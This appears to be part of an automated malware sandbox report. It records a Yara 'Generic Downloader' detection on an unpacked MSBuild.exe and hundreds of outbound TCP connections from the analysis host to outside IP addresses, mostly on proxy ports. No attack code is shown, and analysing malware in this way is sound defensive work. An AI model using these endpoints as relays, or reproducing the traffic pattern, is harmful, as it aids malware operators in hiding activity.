                  Source: unknownNetwork traffic detected: HTTP traffic on port 50806 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50734 -> 39652
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 51058
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51450 -> 20074
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51421 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50660 -> 44809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50748 -> 19767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51354
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50859 -> 1555
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50725 -> 47225
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50626 -> 4527
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50661 -> 17464
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51432 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51566 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51461 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50933 -> 32884
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51439 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50869 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51553 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51554 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50802 -> 8083
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51555 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51556 -> 57728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 3306
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51585 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50262 -> 36073
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51452 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51586 -> 2512
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51476 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 84
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51525 -> 6010
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32708 -> 51243
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4154 -> 51166
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51319 -> 8899
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50893 -> 47460
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50775 -> 53281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50880 -> 17228
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51584 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51583 -> 27360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50919 -> 62762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10007 -> 51271
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51597 -> 8585
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5566 -> 51290
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51063 -> 59045
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50447
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51557 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50871 -> 43712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50947 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51600 -> 9764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51591 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51611 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51160
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51601 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51621 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 999 -> 49846
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49829
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50807 -> 25137
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 51344
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10011 -> 51361
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51593 -> 20060
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51011 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51643 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50770 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16379 -> 49832
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 5401
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8585 -> 51597
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 8879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50984 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51661 -> 64943
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51664 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51627 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51596 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51025 -> 58402
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 12217
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51626 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51771 -> 45650
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51669 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51356 -> 43520
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51633 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 6009 -> 49867
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 51106
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49910
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51534 -> 8828
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51276 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 20074 -> 51450
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51663 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51678 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50471 -> 35358
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51439
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: unknownNetwork traffic detected: IP country count 32
                  Source: global trafficTCP traffic: 192.168.2.4:49734 -> 50.63.12.33:50781
                  Source: global trafficTCP traffic: 192.168.2.4:49737 -> 196.43.106.62:5678
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 174.75.211.222:4145
                  Source: global trafficTCP traffic: 192.168.2.4:49733 -> 79.110.52.252:3128
                  Source: global trafficTCP traffic: 192.168.2.4:49738 -> 72.169.67.85:87
                  Source: global trafficTCP traffic: 192.168.2.4:49739 -> 38.162.29.193:3128
                  Source: global trafficTCP traffic: 192.168.2.4:49740 -> 93.90.212.2:4153
                  Source: global trafficTCP traffic: 192.168.2.4:49741 -> 170.81.141.49:61437
                  Source: global trafficTCP traffic: 192.168.2.4:49742 -> 162.214.225.223:54917
                  Source: global trafficTCP traffic: 192.168.2.4:49743 -> 50.235.117.234:39593
                  Source: global trafficTCP traffic: 192.168.2.4:49744 -> 198.71.49.163:3128
                  Source: global trafficTCP traffic: 192.168.2.4:49746 -> 202.183.9.154:5678
                  Source: global trafficTCP traffic: 192.168.2.4:49747 -> 72.10.160.173:7297
                  Source: global trafficTCP traffic: 192.168.2.4:49748 -> 188.166.186.145:8000
                  Source: global trafficTCP traffic: 192.168.2.4:49749 -> 180.210.222.153:1080
                  Source: global trafficTCP traffic: 192.168.2.4:49750 -> 195.128.96.213:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49751 -> 208.87.131.240:41368
                  Source: global trafficTCP traffic: 192.168.2.4:49752 -> 185.32.6.131:8070
                  Source: global trafficTCP traffic: 192.168.2.4:49754 -> 185.159.131.58:22222
                  Source: global trafficTCP traffic: 192.168.2.4:49756 -> 190.220.1.173:56974
                  Source: global trafficTCP traffic: 192.168.2.4:49758 -> 189.29.143.202:4153
                  Source: global trafficTCP traffic: 192.168.2.4:49759 -> 47.242.155.132:10900
                  Source: global trafficTCP traffic: 192.168.2.4:49762 -> 92.118.132.125:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49763 -> 40.76.160.143:9002
                  Source: global trafficTCP traffic: 192.168.2.4:49764 -> 205.196.184.69:50704
                  Source: global trafficTCP traffic: 192.168.2.4:49765 -> 171.39.31.66:5678
                  Source: global trafficTCP traffic: 192.168.2.4:49766 -> 47.114.101.57:8888
                  Source: global trafficTCP traffic: 192.168.2.4:49768 -> 196.202.210.73:32650
                  Source: global trafficTCP traffic: 192.168.2.4:49769 -> 107.180.103.214:61634
                  Source: global trafficTCP traffic: 192.168.2.4:49770 -> 148.72.209.174:38088
                  Source: global trafficTCP traffic: 192.168.2.4:49772 -> 199.58.185.9:4145
                  Source: global trafficTCP traffic: 192.168.2.4:49773 -> 61.254.81.88:9000
                  Source: global trafficTCP traffic: 192.168.2.4:49774 -> 82.223.121.72:15464
                  Source: global trafficTCP traffic: 192.168.2.4:49775 -> 45.229.10.98:8402
                  Source: global trafficTCP traffic: 192.168.2.4:49776 -> 175.139.179.65:42580
                  Source: global trafficTCP traffic: 192.168.2.4:49777 -> 36.66.133.19:5678
                  Source: global trafficTCP traffic: 192.168.2.4:49778 -> 132.148.245.247:7183
                  Source: global trafficTCP traffic: 192.168.2.4:49780 -> 159.65.253.201:51080
                  Source: global trafficTCP traffic: 192.168.2.4:49781 -> 114.156.77.107:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49783 -> 92.204.134.38:42571
                  Source: global trafficTCP traffic: 192.168.2.4:49784 -> 103.199.155.18:6969
                  Source: global trafficTCP traffic: 192.168.2.4:49785 -> 178.115.253.35:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49786 -> 20.44.188.17:3129
                  Source: global trafficTCP traffic: 192.168.2.4:49787 -> 213.125.215.188:8090
                  Source: global trafficTCP traffic: 192.168.2.4:49789 -> 84.241.8.234:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49790 -> 51.158.79.76:16379
                  Source: global trafficTCP traffic: 192.168.2.4:49791 -> 197.234.13.23:4145
                  Source: global trafficTCP traffic: 192.168.2.4:49792 -> 135.148.10.161:51507
                  Source: global trafficTCP traffic: 192.168.2.4:49794 -> 39.107.33.254:8090
                  Source: global trafficTCP traffic: 192.168.2.4:49795 -> 36.92.48.103:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49796 -> 198.57.211.235:11096
                  Source: global trafficTCP traffic: 192.168.2.4:49797 -> 164.92.86.113:60283
                  Source: global trafficTCP traffic: 192.168.2.4:49799 -> 121.134.198.156:4145
                  Source: global trafficTCP traffic: 192.168.2.4:49805 -> 109.224.22.34:51372
                  Source: global trafficTCP traffic: 192.168.2.4:49806 -> 117.160.250.163:9990
                  Source: global trafficTCP traffic: 192.168.2.4:49808 -> 68.183.180.222:3128
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 196.204.24.254:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 41.65.55.10:1981
                  Source: global trafficTCP traffic: 192.168.2.4:49811 -> 45.117.179.179:6522
                  Source: global trafficTCP traffic: 192.168.2.4:49812 -> 173.249.33.122:3880
                  Source: global trafficTCP traffic: 192.168.2.4:49813 -> 203.74.125.18:8888
                  Source: global trafficTCP traffic: 192.168.2.4:49815 -> 38.162.25.80:3128
                  Source: global trafficTCP traffic: 192.168.2.4:49816 -> 66.29.128.241:34633
                  Source: global trafficTCP traffic: 192.168.2.4:49820 -> 80.92.227.185:5678
                  Source: global trafficTCP traffic: 192.168.2.4:49821 -> 102.223.176.18:8092
                  Source: global trafficTCP traffic: 192.168.2.4:49823 -> 103.140.34.61:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49825 -> 209.182.192.90:28749
                  Source: global trafficTCP traffic: 192.168.2.4:49826 -> 5.135.136.60:9090
                  Source: global trafficTCP traffic: 192.168.2.4:49827 -> 41.65.227.98:1981
                  Source: global trafficTCP traffic: 192.168.2.4:49828 -> 37.187.77.58:37920
                  Source: global trafficTCP traffic: 192.168.2.4:49829 -> 38.162.0.95:3128
                  Source: global trafficTCP traffic: 192.168.2.4:49830 -> 200.95.184.62:999
                  Source: global trafficTCP traffic: 192.168.2.4:49831 -> 117.102.224.38:1080
                  Source: global trafficTCP traffic: 192.168.2.4:49832 -> 163.172.137.49:16379
                  Source: global trafficTCP traffic: 192.168.2.4:49833 -> 161.97.170.209:58897
                  Source: global trafficTCP traffic: 192.168.2.4:49834 -> 138.117.179.54:5678
                  Source: global trafficTCP traffic: 192.168.2.4:49835 -> 66.228.33.190:24360
                  Source: global trafficTCP traffic: 192.168.2.4:49837 -> 92.204.135.37:33899
                  Source: global trafficTCP traffic: 192.168.2.4:49838 -> 124.105.183.81:8082
                  Source: global trafficTCP traffic: 192.168.2.4:49841 -> 77.241.20.215:55915
                  Source: global trafficTCP traffic: 192.168.2.4:49844 -> 111.224.213.196:8089
                  Source: global trafficTCP traffic: 192.168.2.4:49845 -> 195.175.22.194:5678
                  Source: global trafficTCP traffic: 192.168.2.4:49846 -> 177.234.194.226:999
                  Source: global trafficTCP traffic: 192.168.2.4:49847 -> 45.159.150.23:3128
                  Source: global trafficTCP traffic: 192.168.2.4:49848 -> 43.155.185.36:1080
                  Source: global trafficTCP traffic: 192.168.2.4:49850 -> 203.112.134.74:5678
                  Source: global trafficTCP traffic: 192.168.2.4:49852 -> 5.180.19.163:1080
                  Source: global trafficTCP traffic: 192.168.2.4:49853 -> 72.206.181.103:4145
                  Source: global trafficTCP traffic: 192.168.2.4:49854 -> 103.66.233.173:4145
                  Source: global trafficTCP traffic: 192.168.2.4:49855 -> 189.240.60.171:9090
                  Source: global trafficTCP traffic: 192.168.2.4:49856 -> 203.170.75.14:4153
                  Source: global trafficTCP traffic: 192.168.2.4:49857 -> 77.238.79.111:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49858 -> 67.241.211.61:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49861 -> 162.214.164.200:42624
                  Source: global trafficTCP traffic: 192.168.2.4:49862 -> 68.183.104.254:8000
                  Source: global trafficTCP traffic: 192.168.2.4:49863 -> 181.78.73.73:999
                  Source: global trafficTCP traffic: 192.168.2.4:49864 -> 45.88.90.199:3128
                  Source: global trafficTCP traffic: 192.168.2.4:49865 -> 152.67.208.80:57048
                  Source: global trafficTCP traffic: 192.168.2.4:49866 -> 207.244.241.165:53718
                  Source: global trafficTCP traffic: 192.168.2.4:49867 -> 45.11.95.166:6009
                  Source: global trafficTCP traffic: 192.168.2.4:49868 -> 103.114.96.125:8291
                  Source: global trafficTCP traffic: 192.168.2.4:49869 -> 18.185.169.150:3128
                  Source: global trafficTCP traffic: 192.168.2.4:49870 -> 123.182.59.109:8089
                  Source: global trafficTCP traffic: 192.168.2.4:49871 -> 92.205.61.38:50903
                  Source: global trafficTCP traffic: 192.168.2.4:49872 -> 178.212.65.61:3629
                  Source: global trafficTCP traffic: 192.168.2.4:49874 -> 81.150.169.217:5678
                  Source: global trafficTCP traffic: 192.168.2.4:49876 -> 197.234.58.102:32767
                  Source: global trafficTCP traffic: 192.168.2.4:49880 -> 198.12.253.117:51258
                  Source: global trafficTCP traffic: 192.168.2.4:49882 -> 135.125.225.75:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49881 -> 85.187.151.28:38982
                  Source: global trafficTCP traffic: 192.168.2.4:49885 -> 181.209.122.74:999
                  Source: global trafficTCP traffic: 192.168.2.4:49886 -> 72.195.34.42:4145
                  Source: global trafficTCP traffic: 192.168.2.4:49888 -> 201.184.159.28:5678
                  Source: global trafficTCP traffic: 192.168.2.4:49889 -> 195.154.43.182:12671
                  Source: global trafficTCP traffic: 192.168.2.4:49890 -> 75.119.145.169:61344
                  Source: global trafficTCP traffic: 192.168.2.4:49891 -> 181.212.41.172:999
                  Source: global trafficTCP traffic: 192.168.2.4:49892 -> 95.31.5.29:54651
                  Source: global trafficTCP traffic: 192.168.2.4:49894 -> 115.248.66.131:3129
                  Source: global trafficTCP traffic: 192.168.2.4:49895 -> 139.162.182.54:11127
                  Source: global trafficTCP traffic: 192.168.2.4:49896 -> 159.223.166.21:5199
                  Source: global trafficTCP traffic: 192.168.2.4:49897 -> 103.170.115.213:2020
                  Source: global trafficTCP traffic: 192.168.2.4:49898 -> 138.0.228.120:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49899 -> 179.107.51.47:4153
                  Source: global trafficTCP traffic: 192.168.2.4:49900 -> 176.197.219.74:1080
                  Source: global trafficTCP traffic: 192.168.2.4:49901 -> 188.166.17.18:8881
                  Source: global trafficTCP traffic: 192.168.2.4:49902 -> 103.47.93.221:1080
                  Source: global trafficTCP traffic: 192.168.2.4:49904 -> 104.165.127.238:3128
                  Source: global trafficTCP traffic: 192.168.2.4:49905 -> 113.160.164.181:1080
                  Source: global trafficTCP traffic: 192.168.2.4:49908 -> 62.171.131.101:37447
                  Source: global trafficTCP traffic: 192.168.2.4:49909 -> 103.8.40.140:1080
                  Source: global trafficTCP traffic: 192.168.2.4:49910 -> 38.162.18.181:3128
                  Source: global trafficTCP traffic: 192.168.2.4:49911 -> 111.225.152.79:8089
                  Source: global trafficTCP traffic: 192.168.2.4:49912 -> 3.122.84.99:3128
                  Source: global trafficTCP traffic: 192.168.2.4:49913 -> 103.105.126.18:84
                  Source: global trafficTCP traffic: 192.168.2.4:49914 -> 51.222.241.157:40351
                  Source: global trafficTCP traffic: 192.168.2.4:49915 -> 36.91.45.12:51299
                  Source: global trafficTCP traffic: 192.168.2.4:49916 -> 213.233.178.137:3128
                  Source: global trafficTCP traffic: 192.168.2.4:49917 -> 103.24.107.186:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49918 -> 206.189.9.30:42331
                  Source: global trafficTCP traffic: 192.168.2.4:49919 -> 91.134.140.160:8879
                  Source: global trafficTCP traffic: 192.168.2.4:49921 -> 5.189.133.192:50893
                  Source: global trafficTCP traffic: 192.168.2.4:49923 -> 211.54.26.187:3128
                  Source: global trafficTCP traffic: 192.168.2.4:49925 -> 173.255.202.28:39319
                  Source: global trafficTCP traffic: 192.168.2.4:49926 -> 103.47.93.238:1080
                  Source: global trafficTCP traffic: 192.168.2.4:49927 -> 8.242.85.6:999
                  Source: global trafficTCP traffic: 192.168.2.4:49928 -> 111.38.73.92:9002
                  Source: global trafficTCP traffic: 192.168.2.4:49929 -> 109.73.184.254:5678
                  Source: global trafficTCP traffic: 192.168.2.4:49930 -> 67.43.227.226:27149
                  Source: global trafficTCP traffic: 192.168.2.4:49924 -> 80.63.84.58:8081
                  Source: global trafficTCP traffic: 192.168.2.4:49932 -> 154.239.9.82:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49934 -> 103.56.206.65:4996
                  Source: global trafficTCP traffic: 192.168.2.4:49935 -> 122.155.165.191:3128
                  Source: global trafficTCP traffic: 192.168.2.4:49936 -> 203.189.150.48:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49937 -> 174.77.111.197:4145
                  Source: global trafficTCP traffic: 192.168.2.4:49945 -> 186.97.109.83:999
                  Source: global trafficTCP traffic: 192.168.2.4:49946 -> 160.119.148.190:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49947 -> 197.211.24.206:5678
                  Source: global trafficTCP traffic: 192.168.2.4:49948 -> 103.143.8.126:8089
                  Source: global trafficTCP traffic: 192.168.2.4:49950 -> 45.81.232.17:14669
                  Source: global trafficTCP traffic: 192.168.2.4:49951 -> 171.244.140.160:62310
                  Source: global trafficTCP traffic: 192.168.2.4:49952 -> 101.51.241.126:4153
                  Source: global trafficTCP traffic: 192.168.2.4:49954 -> 181.205.41.210:7654
                  Source: global trafficTCP traffic: 192.168.2.4:49955 -> 178.65.171.6:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49956 -> 103.180.1.242:1111
                  Source: global trafficTCP traffic: 192.168.2.4:49957 -> 194.4.50.94:12334
                  Source: global trafficTCP traffic: 192.168.2.4:49958 -> 31.44.82.2:38080
                  Source: global trafficTCP traffic: 192.168.2.4:49959 -> 203.218.172.225:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49960 -> 91.189.177.188:3128
                  Source: global trafficTCP traffic: 192.168.2.4:49961 -> 51.79.87.144:54395
                  Source: global trafficTCP traffic: 192.168.2.4:49962 -> 67.43.236.20:7315
                  Source: global trafficTCP traffic: 192.168.2.4:49963 -> 114.231.45.178:8089
                  Source: global trafficTCP traffic: 192.168.2.4:49964 -> 181.129.198.58:5678
                  Source: global trafficTCP traffic: 192.168.2.4:49965 -> 195.211.219.147:5555
                  Source: global trafficTCP traffic: 192.168.2.4:49966 -> 184.181.217.201:4145
                  Source: global trafficTCP traffic: 192.168.2.4:49969 -> 110.74.221.48:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49972 -> 161.97.163.52:30189
                  Source: global trafficTCP traffic: 192.168.2.4:49974 -> 103.159.66.61:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49975 -> 162.12.217.4:3629
                  Source: global trafficTCP traffic: 192.168.2.4:49976 -> 161.35.88.210:3128
                  Source: global trafficTCP traffic: 192.168.2.4:49979 -> 51.15.247.93:16379
                  Source: global trafficTCP traffic: 192.168.2.4:49980 -> 103.105.68.9:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49981 -> 139.59.128.40:2016
                  Source: global trafficTCP traffic: 192.168.2.4:49982 -> 156.239.50.40:3128
                  Source: global trafficTCP traffic: 192.168.2.4:49983 -> 46.100.106.242:6030
                  Source: global trafficTCP traffic: 192.168.2.4:49984 -> 103.105.228.35:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49986 -> 189.3.69.230:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49987 -> 183.88.46.37:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49988 -> 148.72.206.250:14076
                  Source: global trafficTCP traffic: 192.168.2.4:49989 -> 103.79.96.169:4153
                  Source: global trafficTCP traffic: 192.168.2.4:49991 -> 173.212.227.160:55066
                  Source: global trafficTCP traffic: 192.168.2.4:49992 -> 154.12.253.232:52127
                  Source: global trafficTCP traffic: 192.168.2.4:49994 -> 185.108.141.19:8080
                  Source: global trafficTCP traffic: 192.168.2.4:49996 -> 186.215.196.50:3128
                  Source: global trafficTCP traffic: 192.168.2.4:49997 -> 72.167.222.113:12581
                  Source: global trafficTCP traffic: 192.168.2.4:49999 -> 179.1.133.33:999
                  Source: global trafficTCP traffic: 192.168.2.4:50000 -> 154.26.138.203:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50001 -> 46.51.249.135:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50004 -> 154.64.219.2:8888
                  Source: global trafficTCP traffic: 192.168.2.4:50005 -> 84.17.51.241:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50006 -> 188.132.222.40:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50007 -> 141.95.160.178:5870
                  Source: global trafficTCP traffic: 192.168.2.4:50008 -> 91.192.25.158:4145
                  Source: global trafficTCP traffic: 192.168.2.4:50010 -> 45.15.170.94:32768
                  Source: global trafficTCP traffic: 192.168.2.4:50012 -> 170.81.131.70:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50013 -> 13.37.89.201:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50016 -> 179.1.192.17:999
                  Source: global trafficTCP traffic: 192.168.2.4:50017 -> 149.20.253.52:12551
                  Source: global trafficTCP traffic: 192.168.2.4:50018 -> 77.233.5.68:55443
                  Source: global trafficTCP traffic: 192.168.2.4:50019 -> 46.209.207.147:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50020 -> 104.37.175.202:49322
                  Source: global trafficTCP traffic: 192.168.2.4:50021 -> 194.31.79.75:50920
                  Source: global trafficTCP traffic: 192.168.2.4:50022 -> 162.214.227.68:43435
                  Source: global trafficTCP traffic: 192.168.2.4:50023 -> 182.53.224.189:4153
                  Source: global trafficTCP traffic: 192.168.2.4:50024 -> 113.100.209.184:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50025 -> 78.188.81.57:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50026 -> 38.162.10.51:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50027 -> 1.85.33.94:6666
                  Source: global trafficTCP traffic: 192.168.2.4:50028 -> 31.24.44.92:52173
                  Source: global trafficTCP traffic: 192.168.2.4:50029 -> 148.72.212.183:2792
                  Source: global trafficTCP traffic: 192.168.2.4:50031 -> 185.92.244.37:63550
                  Source: global trafficTCP traffic: 192.168.2.4:50032 -> 138.0.228.122:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50033 -> 46.0.203.186:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50034 -> 162.241.6.97:44607
                  Source: global trafficTCP traffic: 192.168.2.4:50036 -> 213.131.230.161:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50038 -> 125.27.253.117:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50039 -> 52.151.210.204:9000
                  Source: global trafficTCP traffic: 192.168.2.4:50042 -> 36.89.158.91:4480
                  Source: global trafficTCP traffic: 192.168.2.4:50043 -> 54.36.122.16:39713
                  Source: global trafficTCP traffic: 192.168.2.4:50044 -> 162.255.108.5:5678
                  Source: global trafficTCP traffic: 192.168.2.4:50045 -> 186.235.184.9:4153
                  Source: global trafficTCP traffic: 192.168.2.4:50047 -> 200.95.184.58:999
                  Source: global trafficTCP traffic: 192.168.2.4:50049 -> 162.241.50.179:34099
                  Source: global trafficTCP traffic: 192.168.2.4:50050 -> 31.200.242.201:12196
                  Source: global trafficTCP traffic: 192.168.2.4:50051 -> 94.131.106.196:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50053 -> 36.91.148.36:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50054 -> 54.37.196.189:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50055 -> 201.243.82.157:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50056 -> 200.116.199.179:6969
                  Source: global trafficTCP traffic: 192.168.2.4:50057 -> 206.189.145.23:59867
                  Source: global trafficTCP traffic: 192.168.2.4:50058 -> 198.20.116.86:9000
                  Source: global trafficTCP traffic: 192.168.2.4:50059 -> 186.248.87.172:5678
                  Source: global trafficTCP traffic: 192.168.2.4:50061 -> 90.74.184.32:999
                  Source: global trafficTCP traffic: 192.168.2.4:50064 -> 108.175.24.1:13135
                  Source: global trafficTCP traffic: 192.168.2.4:50066 -> 12.7.109.1:8899
                  Source: global trafficTCP traffic: 192.168.2.4:50069 -> 217.172.122.14:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50070 -> 156.54.240.53:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50072 -> 170.210.121.190:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50073 -> 122.52.196.36:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50074 -> 1.194.236.229:5005
                  Source: global trafficTCP traffic: 192.168.2.4:50075 -> 103.179.124.10:1080
                  Source: global trafficTCP traffic: 192.168.2.4:50076 -> 5.9.173.158:30000
                  Source: global trafficTCP traffic: 192.168.2.4:50077 -> 103.79.96.174:4153
                  Source: global trafficTCP traffic: 192.168.2.4:50078 -> 34.79.91.3:59040
                  Source: global trafficTCP traffic: 192.168.2.4:50079 -> 146.59.18.246:40975
                  Source: global trafficTCP traffic: 192.168.2.4:50081 -> 45.8.21.43:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50082 -> 45.189.118.92:999
                  Source: global trafficTCP traffic: 192.168.2.4:50084 -> 102.16.24.30:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50086 -> 194.163.129.90:43076
                  Source: global trafficTCP traffic: 192.168.2.4:50087 -> 188.214.129.3:4048
                  Source: global trafficTCP traffic: 192.168.2.4:50089 -> 195.158.8.150:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50090 -> 143.202.97.171:999
                  Source: global trafficTCP traffic: 192.168.2.4:50091 -> 188.132.222.23:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50092 -> 47.91.65.23:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50093 -> 37.114.192.128:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50094 -> 110.78.81.107:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50095 -> 103.47.93.227:1080
                  Source: global trafficTCP traffic: 192.168.2.4:50096 -> 148.72.206.84:34761
                  Source: global trafficTCP traffic: 192.168.2.4:50097 -> 162.19.7.53:64654
                  Source: global trafficTCP traffic: 192.168.2.4:50099 -> 173.212.209.216:27138
                  Source: global trafficTCP traffic: 192.168.2.4:50102 -> 115.127.112.74:8090
                  Source: global trafficTCP traffic: 192.168.2.4:50103 -> 94.198.211.217:5678
                  Source: global trafficTCP traffic: 192.168.2.4:50104 -> 114.7.161.18:1080
                  Source: global trafficTCP traffic: 192.168.2.4:50105 -> 146.19.106.193:12334
                  Source: global trafficTCP traffic: 192.168.2.4:50106 -> 103.47.93.217:1080
